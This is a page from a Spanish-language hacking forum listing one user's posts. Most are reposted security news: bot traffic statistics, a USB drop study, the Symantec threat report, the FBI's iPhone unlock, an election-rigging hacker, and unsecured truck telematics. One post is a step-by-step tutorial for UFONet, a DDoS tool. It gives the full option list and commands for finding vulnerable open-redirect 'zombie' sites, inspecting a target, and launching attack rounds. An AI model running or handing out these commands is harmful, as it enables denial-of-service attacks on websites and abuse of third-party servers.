Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - HATI

#161

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es una empresa especializada en la detección y mitigación de bots que recientemente ha lanzado su tercer informe anual sobre la actividad de este tipo de software en Internet.

En el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se menciona que en 2015 el 54,4% de todo el tráfico web está generado por humanos, mientras que los bots benignos representaron el 27% y los bots maliciosos el 18,6%. Esto quiere decir que el 45,6% del tráfico total lo generaron bots.


Según Distil Networks, los humanos volvieron a ser en 2015 los principales generadores de tráfico en la web tras perder esa posición en 2014, cuando los bots acumularon el 59,1% de todo el tráfico generado. Además también avisa del aumento de la presencia de los Bots Persistentes Avanzados (APB), que representaron el 88% del tráfico de los bots maliciosos.


Los bots modernos se pueden hacer pasar por humanos


Los APB son capaces de imitar el comportamiento y las respuestas humanas a través una amplia gama de operaciones técnicas que anteriormente se consideraban demasiado complejas como para ser introducidas en un software de estas características.

La lista de operaciones técnicas incluyen la posibilidad de cargar JavaScript, cargar activos externos, manipular cookies, realizar tareas automáticas en navegadores web, engañar con la dirección IP e incluso utilizar user agents personalizados. Además los APB son capaces de cambiar su IP dinámicamente para evitar su detección, incluyendo aquí la red Tor y servicios de proxies.

Según la empresa, el 53% de estos bots pueden cargar JavaScript, el 36% cambiar el user agent, el 39% imitar la interacción humana con una página web y el 73% puede ocultar su IP de origen. Centrándonos en los APB que tienen esta última característica, algunos han sido capaces de utilizar 100 IP diferentes por cada campaña.

¿Por quiénes se hacen pasar los bots maliciosos?


Si en 2014 los bots maliciosos preferían hacerse pasar por Firefox, con Google Chrome pisándole los talones, en 2015 el user agent de Google Chrome ha sido el más empleado con gran diferencia, acumulando el 26,9% del tráfico, mientras que Firefox descendió del 26,62% hasta el 17,67%. Otro que ha experimentado un gran aumento ha sido Safari, que se cuela en el ranking con el 5,01%.

La mayoría del tráfico generado procede de Estados Unidos, sobre todo la infraestructura AWS de Amazon, sobre la cual los bots representaron el 31% del tráfico total en 2015. Mientras que en la industria editorial los bots representaron el 31% del tráfico durante ese año, con un crecimiento a nivel cuantitativo del tráfico generado por bots del 300%.



Las personas interesadas pueden obtener todo el No tienes permitido ver los links. Registrarse o Entrar a mi cuentadesde el sitio web de Distil Networks.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#162

¿Cuanto de imprudentes son los usuarios a la hora de conectar unidades USB de procedencia desconocida? Según un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta del que se han hecho eco en Motherboard, los usuarios son aparentemente mucho más descuidados de lo que tendrían que ser.

El estudio consistió en un experimento en el cual soltaron 297 unidades USB en el campus Urbana-Champaign durante el año pasado, obteniendo los investigadores unos resultados más bien preocupantes. Las unidades USB no tenían ningún malware, pero sí contenían una encuesta construida con HTML para poder averiguar el patrón comportamiento de aquellos usuarios que cogían las unidades USB de procedencia desconocida.


Los investigadores han estimado que el 48% de los usuarios que hallaron una unidad USB perdida decidieron conectarla a su ordenador y abrir los ficheros que contenía. Además el 98% de las unidades USB fueron al menos movidas de su posición original, indicando que las unidades USB perdidas despiertan la curiosidad de quienes las encuentran. De todas las personas que decidieron conectar las unidades USB, el 68% de estas lo hicieron sin tomar ninguna precaución, una práctica bastante peligrosa e imprudente independientemente del sistema operativo que se esté utilizando.

Por otro lado, el 68% de las personas que cogieron un dispositivo USB respondieron que lo conectaron con el fin de averiguar quién es el dueño legítimo del dispositivo, mientras que solo el 18% reconoció haberlo hecho por simple curiosidad. Y es que además de los problemas de seguridad, dejar perdido un pendrive con contenidos sensibles también puede tener consecuencias desastrosas.

Otro dato preocupante es que muchos alumnos han "confiado en las defensas de su MacBook" para evitar infecciones y ataques, mientras que otros decidieron "sacrificar una computadora de la universidad".

Viendo que el estudio se hizo dentro de un entorno universitario, lo lógico es pensar que los alumnos tienen información sobre lo peligroso que es coger una unidad USB de procedencia desconocida, sin embargo, parece que a pesar de la abundancia de información no se está consiguiendo concienciar a la gente.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#163

El No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, Volumen 21, ha revelado la existencia de una tendencia organizada por parte de los ciberdelincuentes: están adoptando las mejores prácticas corporativas y estableciendo negocios profesionales para incrementar la eficiencia de sus ataques dirigidos contra empresas y consumidores. Esta nueva clase de cibercriminales profesionales abarca todo el ecosistema de atacantes, ampliando el alcance de las amenazas para empresas y consumidores e impulsando el crecimiento de los delitos online.

Los grupos de ataque profesionales avanzados son los primeros en aprovechar las vulnerabilidades de día cero, utilizándolas para su propio beneficio o vendiéndolas a otros delincuentes de menor nivel en el mercado abierto, donde rápidamente se convierten en productos de consumo. En 2015, el número de vulnerabilidades de día cero descubiertas se duplicó hasta alcanzar el récord de 54, un incremento del 125% respecto al año anterior, confirmando el papel crítico que juegan en los ataques dirigidos con fines de lucro. Al mismo tiempo, el malware creció a un asombroso ritmo, con 430 millones de nuevas variantes de malware descubiertas en 2015. El creciente volumen de malware prueba que los ciberdelincuentes profesionales están aprovechando sus enormes recursos para intentar derribar y entrar en las redes corporativas.

En 2015, España se convirtió en el 19º país a nivel mundial, y el octavo en Europa, como fuente de ciberamenazas. Por lo que se refiere al ransomware, España está incluso en puestos más altos dentro de los rankings globales, ocupando la decimocuarta posición con más de 107.000 amenazas de este tipo detectadas, casi 300 al día. Los ataques dirigidos continúan llevándose a cabo en el país, la mayor parte de ellos contra pequeñas y medianas empresas, con un 70% de pymes afectadas. Los servicios, así como la banca y la industria de seguros, son los sectores a los que más se dirigen los ataques, contabilizando más del 80 % del total. Los españoles también son objetivo de las estafas en redes sociales. Destaca el hecho de que las ofertas falsas representan una alta proporción entre todas las amenazas de redes sociales detectadas, contabilizando casi el 40% de todas las registradas, casi tantas como las que se comparten individualmente.

Además, las fugas de datos continúan impactando en la empresa. De hecho, las grandes empresas que son objetivo de ataques lo serán, de media, tres veces más a lo largo del año. En 2015 fuimos testigos de la mayor fuga de datos hecha pública, con 191 millones de registros comprometidos en un único incidente. Hubo también un récord total de nueve mega fugas. Aunque se vieron expuestas 429 millones de identidades, el número de empresas que eligen no informar sobre el número de registros perdidos subió hasta el 85%. Una estimación conservadora desde Symantec respecto a estas fugas no declaradas sitúa el número real de registros perdidos por encima de los 500 millones.

Por su parte, el ransomware también ha seguido evolucionando en 2015, y el tipo más dañino de ataques de ransomware encriptado (crypto-ransomware) ha crecido un 35%. Estos ataques de crypto-ransomware más agresivos encriptan todos los contenidos digitales de la víctima y los guardan hasta que se paga por el rescate. Este año, el ransomware pasó de los PCs a los smartphones, y a los sistemas Mac y Linux, ya que los atacantes están cada vez más interesados en cualquier dispositivo conectado a una red que pueda ser secuestrado para su beneficio, lo que indica que las empresas son el siguiente objetivo.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#164
Saludos, antes de la noticias les dejo una pequeña reflexión personal:

Después de todo el dilema que se generó, el FBI lo hace sin ayuda de Apple. En mi opinión, y seguro que también la de muchos, solo intentaban tener posible acceso a la privacidad de los usuarios de la manzana, y ante la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y las No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no les ha quedado otra que hacerlo con sus propios medios. Seguro que esta noticia no tiene tanta repercusión como las demás. Aqui se la dejo:



El Buró Federal de Investigación (FBI) de EEUU pagó a un grupo de 'hackers' profesionales para que le ayudasen a acceder al teléfono iPhone utilizado por el autor del tiroteo en la localidad californiana de San Bernardino en diciembre pasado que se cobró la vida de 14 personas.

Según publicó hoy el Washington Post, que citó fuentes policiales no identificadas, el FBI contactó con los piratas informáticos, que hallaron un defecto de software no conocido hasta entonces y facilitaron la información a los agentes para que estos creasen una pieza de hardware que les permitió acceder al teléfono.

El método permitió a los investigadores flanquear el código personal de cuatro dígitos sin activar un mecanismo de seguridad usado por Apple, fabricante del dispositivo, que hubiese eliminado todo el contenido del teléfono en caso de introducir códigos incorrectos más de 10 veces.

Al grupo de 'hackers' profesionales, que habitualmente colaboran con el Gobierno estadounidense, se les pagó una cantidad no revelada.

El FBI accedió al teléfono de Rizwan Farook, responsable junto a su esposa Tashfeen Malik de la muerte de 14 personas en diciembre en California, después de un largo litigio legal y de que Apple se negase a prestar su ayuda.

La compañía alegaba que, de acceder a la demanda del Gobierno, ponía en riesgo la privacidad de todos sus dispositivos.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#165
Saludos, es una duda simple:

¿Por que el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no aparece en el índice de Programación Scripting?

Creo que sería buena idea añadirlo, ya que, añado: el buscador del foro no realiza una busqueda correcta al introducir c++

Creo que podría tratarse de un bug del buscador.
Hati,  ;D
#166
Hacking / UFONet - DDoS Botnet vía Web Abuse.
Abril 12, 2016, 10:03:10 AM
UFONet


Puedes leer este post en inglés: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Seguro que muchos de vosotros ya lo conoceis debido a que se trata de una herramienta con cierto tiempo, pero no encontre nada sobre ella en el foro y por este motivo he decidido escribir el post.

Resumiendo, UFONet es una herramienta para realizar ataques DDoS, que aprovecha la vulnerabilidad Open Redirect en aplicaciones web de terceros y actúa de forma similar a una botnet.
La vulnerabilidad Open Redirect permite al atacante realizar una redirección al lugar que él escoga, debido a que dicha redirección se encuentra en una variable que el usuario puede controlar.

Creo que se trata de una herramienta curiosa y facil de usar, que ha buscado una forma útil y poco vista de explotar esta vulnerabilidad.

--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: 'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:

    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:

    -i INSPECT                                           Search for biggest file (ex: -i 'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s):No tienes permitido ver los links. Registrarse o Entrar a mi cuenta')


Método de ataque:

#Busqueda de zombies:

Para realizar un ataque DDoS mediante UFONet, primero debemos recolectar sitios web que sean vulnerables a Open Redirect (zombies). Para ello hay que usar determinados Dorks. La herramienta incluye un wordlist llamado dorks.txt donde podemos encontrar algunos parámetros útiles como "proxy.php?url=" o "validator?uri=".

-Buscar con un parámetro:
Código: php
./ufonet -s 'proxy.php?url='


-Buscar con una lista de dorks:
Código: php
./ufonet -s 'proxy.php?url='


-UFONet permite seleccionar el motor de búsqueda entre google, duck, yahoo, yandex y bing:
Código: php
./ufonet -s 'proxy.php?url=' --se 'bing'


-Buscar en todos los motores de búsqueda:
Código: php
./ufonet -s 'proxy.php?url=' --sa 


-Controlar el número máximo de "zombies" como resultado:
Código: php
  ./ufonet --sd 'dorks.txt' --sa --sn 20


-Tras la búsqueda se nos pregunta si queremos comprobar si las urls "zombie" encontradas son realmente vulnerables:
Código: php
 Wanna check if they are valid zombies? (Y/n)


-Tras el chequeo, se nos pregunta si queremos actualizar la lista de "zombies" añadiendo los nuevos sitios vulnerables a Open Redirect:
Código: php
Wanna update your list (Y/n)



#Probando la botnet:

-Lanzar test:
Código: php
 ./ufonet -t zombies.txt


-Lanzar ataque a ti mismo:
Código: php
 ./ufonet --attack-me 



#Inspeccionando un objetivo:

-Con esta opción encontrarás el fichero de mayor tamaño en el objetivo:
Código: php
./ufonet -i http://target.com


-Usar el resultado con el fin de realizar ataques más efectivos:
Código: php
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"



#Atacando un objetivo:

-Introduce objetivo para atacar un número determinado de rondas (por defecto 1 ronda)
Código: php
./ufonet -a http://target.com -r 10





Estas son las opciones básicas de UFONet, aparte trae otras funciones más avanzadas como el uso de proxy. También es posible usar la herramienta mediante una interfáz gráfica con el comando: 
Código: php
./ufonet --gui


Post en inglés: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo, hati  ;D
#167
El mecanismo es aplicable para smart cities, IoT y seguridad y es capaz de almacenar patrones recogidos en los datos y predecir cuándo se repetirán.

Investigadores de la Escuela Técnica Superior de Ingenieros Informáticos de la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta han desarrollado un sistema que aprende del contexto y detecta, genera, almacena y reutiliza los patrones recogidos en los datos ya analizados previamente en tiempo real y que no han podido ser almacenados, precisamente por su ingente cantidad. Mediante este sistema, se puede predecir el momento en el que estos patrones volverán a aparecer e identificar cambios en el contexto que ayuden a detectar fraudes o spam.



"Nuestro trabajo se centra en un ámbito que es punta de lanza en materia de minería de datos, en data streams", explica Ernestina Menasalvas, del Departamento de Lenguajes y Sistemas Informáticos e Ingeniería del Software de la UPM. "El sistema permite optimizar el desarrollo de modelos de clasificación de minería de datos reutilizando modelos similares en contextos parecidos. Todo ello mejora las capacidades de aplicar la inteligencia artificial a entornos como ciudades inteligentes, Internet de las cosas, o dispositivos móviles".

El mecanismo tiene aplicaciones en materia de ciberseguridad, donde la herramienta permitirá detectar patrones similares y prever ataques cibernéticos, mejorando los sistemas de detección y respuesta. También podría aplicarse a la detección de intrusiones y fraudes por vías informáticas y al desarrollo de filtros antispam.

Los cambios de contexto pueden estar originados por hechos conocidos, como aquellos asociados a la climatología o a la estación del año, o provenir de aspectos desconocidos a priori. Para predecirlos, los investigadores de la UPM desarrollaron una función de similitud basada en técnicas de lógica difusa que extiende el comportamiento básico de decisión sí/no. "Una vez que la función determina si existen modelos de clasificación equivalentes para tratar el nuevo contexto, el sistema puede aplicar los mismos de forma directa gracias a su almacenamiento previo en un repositorio", explica Miguel Ángel Abad, autor de la tesis en la que se exponen los resultados de este trabajo.

El ahorro de recursos es otra de las ventajas que supone este sistema. "Adelantarnos al modo en que se van a comportar los datos supone un ahorro en los recursos computacionales de los dispositivos, por lo que este mecanismo es de aplicación a entornos ubicuos, caracterizados por la existencia de distintos dispositivos que operan en tiempo real y con recursos limitados", explica Miguel Ángel Abad.

Los resultados de este trabajo se han publicado en la revista especializada Expert Systems With Applications Journal, una publicación de referencia sobre sistemas inteligentes y su aplicación en diferentes campos.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#168
Off Topic / HackerStrip - Hackers, nuevos héroes.
Abril 11, 2016, 08:28:48 PM

Os traigo para aquellos que no lo conozcais, el proyecto HackerStrip. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta inició este proyecto en febrero de 2014 pensando en la idea  de que existe poco ocio para los hackers. El argentino Santa hace los dibujos y Raak se encarga de los "storyboards", los guiones y la promoción: "Los investigadores nos mandan sus historias y nosotros las editamos y añadimos algo de ficción".

En sus historias, los protagonistas son Charlie Miller y Chris Valasek, que No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, Mikko Hypponen y Xylitol, considerados los mejores expertos en virus,  Ross Ulbricht, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta... estos y otros personajes más viviran aventuras basadas en hechos reales, mezclandolas con toques de ficción. ¿Qué parte es verdad y qué parte es mentira? Esto queda a la elección del lector.




El principal problema del lector es el sustento económico, aunque algunos opinan que HackerStrip no ha sabido venderse bien, yo pienso que es porque se ha centrado más en el aspecto creativo. Aún así, el proyecto sigue en pie y cada cierto tiempo siguen sacando nuevas historias.

Puedes encontrar los comics en las siguientes páginas:

Página oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Página secundaria: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Indiegogo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#169
George Hotz es el fundador de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una startup de coches autónomos que apenas tiene seis meses. El lunes, la gran firma de capital de riesgo Andreessen Horowitz anunció una inversión de 3,1 millones de dólares a la naciente compañía.



Comma.ai está trabajando en un kit que hará posible convertir vehículos comunes en semi-autónomos. En octubre, Hotz compró un Acura ILX 2016, cámaras GoPro y empezó a desarrollar la tecnología en su cochera en San Francisco.

La meta es llevar el kit al mercado –tanto el programa de visión por computadora como las cámaras– por menos de 1.000 dólares cada uno antes de finales de 2016.

Será relativamente sencillo de instalar, dijo Hotz, "casi como ensamblar un mueble de IKEA".

Chris Dixon, socio de Andreessen Horowitz, escribió que cuando conoció a Hotz por primera vez estaba escéptico. Pero eso pronto se convirtió en entusiasmo tras probar el auto y aprender más sobre la inteligencia artificial detrás de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Hotz, quien Dixon describe como "brillante", ha creado un gran impacto en Silicon Valley a lo largo de la última década.

Cuando tenía 17, descubrió una forma de hackear el iPhone para que todos los proveedores pudieran usar el dispositivo, no solo AT&T (el único proveedor que tuvo contrato inicialmente). Su alias, Geohot, se hizo legendario en los círculos de hackers. Fue al Instituto de Tecnología de Rochester pero lo dejó tras un semestre. Él hizo un internado en Google, trabajó en Facebook y fue demandado por Sony por un hackeo al Playstation 3. Tomó clases de ciencias de la computación en Carnegie Mellon, pero no obtuvo su diploma de graduado.



"Creo que la universidad potencialmente es el peor engaño de la historia", le dijo a CNNMoney.

Hotz, originario de Nueva Jersey, dijo que ha estado fascinado por mucho tiempo por la inteligencia artificial pero no estaba seguro cómo aproximarse a ella.

"Por un tiempo, pensé que sería increíblemente difícil contribuir", dijo. En enero de 2015 empezó a trabajar como investigador en Vicarious, una empresa que está construyendo algoritmos de inteligencia artificial. "Empecé a leer todos los documentos. Pensé, 'esto no es tan difícil. No es ultra-sofisticado. Esto es básico'", dijo.

Además, "los errores que la gente está cometiendo son básicos".

En julio de 2015, Hotz dejó Vicarious con miras a iniciar un trato con Elon Musk, CEO de Tesla. Y no fue sólo un sueño. Hotz conoció al ejecutivo y le propuso una nueva clase de visión de computadora para sus autos. Pero después de tres meses de conversaciones, las pláticas de contratos finalmente cesaron.

Hotz dijo que fue porque Musk quería ser capaz de pasar sobre su tecnología, incluso cuando cubría todos los requerimientos del contrato. Tesla no respondió inmediatamente a la petición de comentarios.

Ahí es cuando Hotz decidió hacerlo por sí mismo.

"Empecé a ver a los demás competidores. Estas personas son unos amateurs", dijo.

En particular, Hotz siente que General Motors fue engañado con su adquisición de 1.000 millones de dólares de la startup Cruise Automation, un kit de manejo autónomo que aún no sale a la venta.

"Ese es un precio de adquisición descabellado para una empresa que tiene tecnología que trabaja dudosamente", dijo Hotz. La inversión de Andreessen Horowit es el primer financiamiento de capital de riesgo que ha recaudado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Hasta ahora, su tecnología ha recorrido exitosamente a lo largo de un trayecto de una hora de Mountain View a San Francisco.

El equipo de Hotz es pequeño –sólo cuatro personas– pero está contratando. Él dijo que obtiene cerca de 100 solicitudes al día de candidatos interesados.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#170
Andrés Sepúlveda es un hacker colombiano que afirma haber manipulado campañas electorales en varios países de Latinoamérica durante los últimos ocho años. La onda expansiva del bombazo soltado por la revista Bloomberg ha sido devastadora.



Si lo que dice es cierto, este hombre es el primer eslabón de una cadena de manipulación electoral en toda la región. Andrés Sepúlveda es colombiano, lleva la cabeza rapada y es hacker de oficio. Y aunque desde mayo del 2014 se encuentra preso  en su país -por ser hallado responsable de interceptaciones ilegales a personas vinculadas al proceso de paz con las FARC- las declaraciones que dio esta semana a la revista Bloomberg Businessweek han sacudido a los gobiernos de Nicaragua, Panamá, Honduras, El Salvador, Colombia, México, Costa Rica, Guatemala y Venezuela.

Sepúlveda afirma haber viajado durante ocho años, a través del continente, a la cabeza de un equipo de hackers, manipulando las principales campañas políticas. Todo ello, mientras se encontraba trabajando para el estratega político venezolano Juan José Rendón (más conocido como JJ Rendón), aunque agrega que es posible que muchos de los candidatos que ayudó no estuvieran al tanto de sus labores ya que "sólo conoció a unos pocos".

De acuerdo a la entrevista que concedió a la revista norteamericana, la carrera del hacker colombiano comenzó el 2005 y sus primeros trabajos consistían, principalmente, en modificar sitios web de campañas y violar bases de datos de opositores con información sobre sus donantes.

Con el paso del tiempo, Sepúlveda armó un equipo que, por 12 mil dólares al mes,  espiaba, robaba y difamaba en representación de campañas presidenciales dentro de Latinomérica.

Por ocho mil dólares más, es decir por 20 mil, los "clientes" podían también elegir un "paquete premium" que incluía interceptación digital, ataque, decodificación y defensa.

Con un presupuesto de 600 mil dólares, el trabajo que dice haber realizado para la campaña del presidente Enrique Peña Nieto en las elecciones mexicanas del 2012, habría sido el más complejo: asegura haber encabezado un equipo de seis hackers que robaron estrategias de campaña, manipularon redes sociales para crear falsos sentimientos de entusiasmo y rechazo, e instalado spyware en sedes de campaña de la oposición, todo con el fin de ayudar a Peña Nieto a obtener la victoria.

El trabajo de Sepúlveda a favor de la campaña de Peña Nieto habría consistido en la interceptación de las computadoras del PRD y el PAN, incluidas las de sus respectivos candidatos presidenciales: Andrés López Obrador y Josefina Vázquez Mota.

Luego del correspondiente desmentido del gobierno de Peña Nieto, Sepúlveda ratificó -a través de su abogado: Jhon Castelblanco- que hizo labores de espionaje informático en la campaña electoral mexicana y que las pruebas que confirman su versión fueron entregadas a Bloomberg.

Según Castelblanco, algunas de esas pruebas -como copias de correos electrónicos y otras evidencias- fueron entregadas por Sepúlveda a la revista norteamericana. La conversación entre su representado y Bloomberg, dijo el abogado, se realizó el año pasado, pero todo fue corroborado por la revista antes de ser publicado.

Vida del hacker


Diferentes medios colombianos han querido dar luces sobre Andrés Sepúlveda, quien era un personaje anónimo hasta el día previo a su captura. 

Se sabe que trabajó en la campaña política de Óscar Zuluaga, ex candidato presidencial del Centro Democrático de su país y que era muy activo en la red social Twitter, donde aún se le pueden leer comentarios como  "matar es un arte que no admite sutilezas",  "sólo guiño mi ojo izquierdo para apuntar mejor", "me gusta el olor a muerte", o "Nelson Mandela, un peligroso comunista menos".

El hombre de 33 años se describe a sí mismo como un hacker "ético", aliado del ciberterrorismo y la ciberguerra, y aunque no lo señalaba directamente, se sabe que es un radical de derecha y seguidor del expresidente Álvaro Uribe.

Las razones por las que Sepúlveda ha soltado tremenda bomba aún son desconocidas. El real alcance de la onda expansiva se desconoce. Él dice que simplemente lo hizo "para tener la conciencia tranquila". (A.N.)


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#171
Saludos,

Hace poco se puso de moda esta aplicación (SimSimi) para Android e IOS, y con ello, comenzaron rumores de toda clase sobre ella. Algunos dicen que te roba los datos del móvil, otros han declarado que No tienes permitido ver los links. Registrarse o Entrar a mi cuenta... En mi opinión, todos estos rumores provienen del desconocimiento sobre las nuevas técnologías y la informática.

Ahora les dejo esta noticia, que aclara el asunto y explica el funcionamiento de la app:


SimSimi no es una aplicación delictiva: Fiscalía

La corporación pide tener cuidado con la información que se proporcioona.




Ante el creciente rumor sobre una aplicación para telefonía inteligente que presuntamente fue diseñada para obtener datos personales de sus usuarios y después, ser utilizados en posibles hechos delictuosos como extorsiones o secuestros, la Policía Cibernética adscrita a la Fiscalía General del Estado de Yucatán aclara a la ciudadanía sobre los usos de la aplicación "SimSimi".
Base de datos mundial

A pesar de no ser una aplicación de mensajería instantánea, "SimSimi" obtiene información para entablar una conversación gracias a las respuestas que otros usuarios de todo el mundo han introducido a ella y que se guarda en una masiva base de datos, la cual se encuentra activa desde 2002.



No revelar datos privados


Si bien esta aplicación no ha sido creada de forma maliciosa, se debe tomar en cuenta que todas las preguntas y respuestas que el usuario escribe y envía mediante ella, forman parte de esa base de datos pública, por lo que el exhorto a la población es no revelar datos confidenciales, personales o financieros, en ésta o en ninguna otra aplicación móvil.

Al poder obtenerla en las tiendas en línea de los sistemas operativos Android e IOS, es poco probable que la aplicación sea controlada por "hackers" u otros grupos delictivos; sin embargo, la recomendación es no revelar información personal por medios electrónicos y hacer uso responsable de la tecnología.

Supervisar a los niños


También se recomienda monitorear la actividad de niños y adolescentes en internet, redes sociales y otro tipo de plataformas tecnológicas, esto con el fin de prevenir cualquier actividad ilícita que pudiera cometerse en su contra y, en caso de que esto ocurriera, se pueda acudir a la FGE a levantar la denuncia correspondiente.

¿Cómo funciona?

Esta app es básicamente una conversación entre el usuario y SimSimi, quien responde cualquier pregunta que se le haga. Lo que ha inquietado a muchos es el tipo de respuestas que da la aplicación, ya que a veces son groseras o dan la impresión de que hay alguien detrás leyendo y contestando.  Como ya se mencionó, SimSimi contesta las preguntas usando respuestas que han sido previamente registradas por los usuarios llenando un formulario que aparece tras tocar el ícono de un lápiz.


Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



#172
Miles de camiones podrían ser hackeados, asegura un investigador de Barcelona.


"Podría bloquear un camión en medio de la M-30" explica José Carlos Norte, un investigador español que ha descubierto lo frágiles que son los aparatos TGU que llevan camiones, autobuses, taxis o furgonetas para recibir órdenes de la central. Una marca en concreto, C4max, muy usada en España, Francia y Marruecos, no lleva ni siquiera contraseña para conectarse a Internet. Un hacker podría, desde su casa, saber por dónde está circulando un camión o mandarlo a dónde quisiera.



José Carlos Norte No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es el jefe de tecnología de la empresa EyeOS, pionera en escritorios virtuales y que hace unos años compró Telefónica. A sus 28 años, José Carlos es un torrente de energía que gasta no sólo en el trabajo sinó también haciendo investigaciones independientes de seguridad informática. Cualquier cosa puede incitar su curiosidad, como tener un amigo propietario de un camión.

"Ví que en el camión tenía un TGU instalado, con una antena 3G y una pantallita, y me dijo: 'Mi jefe se conecta y ve por aquí lo que hago con el camión'", explica José Carlos. TGU son las iniciales de Telematics Gateway Unit (Unidad Telemática de Puerta de Enlace). Todo vehículo que pertenezca a una flota suele estar conectado a la central con este tipo de dispositivos.

José Carlos se dirigió a una gran base de datos pública en Internet llamada Shodan, que recopila todas las direcciones IP de Internet y los puertos que tienen abiertos. Todo dispositivo que se conecte a la red debe tener una dirección IP y los TGUs no son una excepción. La IP es como la dirección física, marca dónde está la puerta de entrada. Paralelamente, leyó montañas de manuales hasta descubrir que existe una marca, que vende en España, Francia y Marruecos, llamada C4max, cuyos dispositivos no tienen contraseña. Y la buscó en Shodan.

"Aparecieron 800 camiones, uno en la M-30, otro que volvía del Eroski... Podía localizarlos con Google Maps", explica. Como el 3G de los camiones se activa cuando están en marcha y se apaga cuando están parados, no es fácil saber cuántos están afectados, pues en Shodan aparecen sólo los activos en aquel momento. José Carlos cree que podrían ser "miles" los vehículos que, ahora mismo, dependen de un dispositivo conectado a Internet sin contraseña, abierto por tanto a cualquiera.

En este punto, explica, paró la investigación, pues intentar hackear un camión no sólo es delito en España sinó también algo muy peligroso: "El TGU va conectado al sistema central de electrónica del camión", explica. Debemos pues aplicar la imaginación: quien hackee un TGU podría parar de golpe el camión y causar un accidente, mandarle coordenadas GPS falsas para llevarlo a un descampado y robarle la carga, espiar un vehículo de flota para VIPs y saber dónde está en cada momento una personalidad importante, etc.

Ante la gravedad del descubrimiento, José Carlos Norte decidió hacerlo público en su blog No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: "Cuando ví que el TGU iba conectado a Ignición decidí escribirlo para hacer ruido con esto, que se genere debate y se vea que esto no es ninguna broma", explica. El investigador lo ha publicado sin avisar antes al fabricante porque: "En España la legislación no me permite avisar al fabricante, ya que podría denunciarme por extorsión".

Desde el último cambio legislativo en este sentido, muchos hackers buenos españoles prefieren callar lo que han visto porque "no existe un marco legal para que los investigadores independientes notifiquen cosas como esta, de forma responsable". En algunos casos, dice José Carlos, "alguien se ha puesto en contacto con una empresa para avisarla y le han dicho que hacía extorsión, o muchas veces cuando las avisas lo primero que te dicen es que te ponen en contacto con su departamento legal".

